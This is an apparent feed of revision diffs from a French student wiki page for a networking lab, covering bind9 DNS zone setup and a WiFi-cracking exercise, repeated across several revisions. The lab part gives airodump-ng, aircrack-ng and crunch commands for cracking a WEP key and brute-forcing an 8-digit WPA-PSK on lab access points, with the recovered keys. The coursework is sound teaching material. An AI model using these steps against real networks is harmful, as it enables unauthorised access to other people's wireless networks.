==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12237</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12237"/>
		<updated>2026-02-10T22:19:40Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Configuration de bind9 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
==== Configuration du paquetage bind9 ====&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.Pour avoir accès au serveur DNS il faut mettre a jour le fichier '''/etc/resolv.conf''' en ajoutant les lignes comme suit :&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Mon_site_web.png&amp;diff=12236</id>
		<title>Fichier:Mon site web.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Mon_site_web.png&amp;diff=12236"/>
		<updated>2026-02-10T21:53:14Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Capture d'écran du site web tompere2.xyz&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12235</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12235"/>
		<updated>2026-02-10T21:33:57Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* DNS/DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
==== Configuration de bind9 ====&lt;br /&gt;
Pour avoir accès au serveur DNS il faut mettre a jour le fichier '''/etc/resolv.conf''' en ajoutant les lignes comme suit :&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12234</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12234"/>
		<updated>2026-02-10T21:33:37Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Serveur Apache */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
'''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
'''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
==== Configuration de bind9 ====&lt;br /&gt;
Pour avoir accès au serveur DNS il faut mettre a jour le fichier '''/etc/resolv.conf''' en ajoutant les lignes comme suit :&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
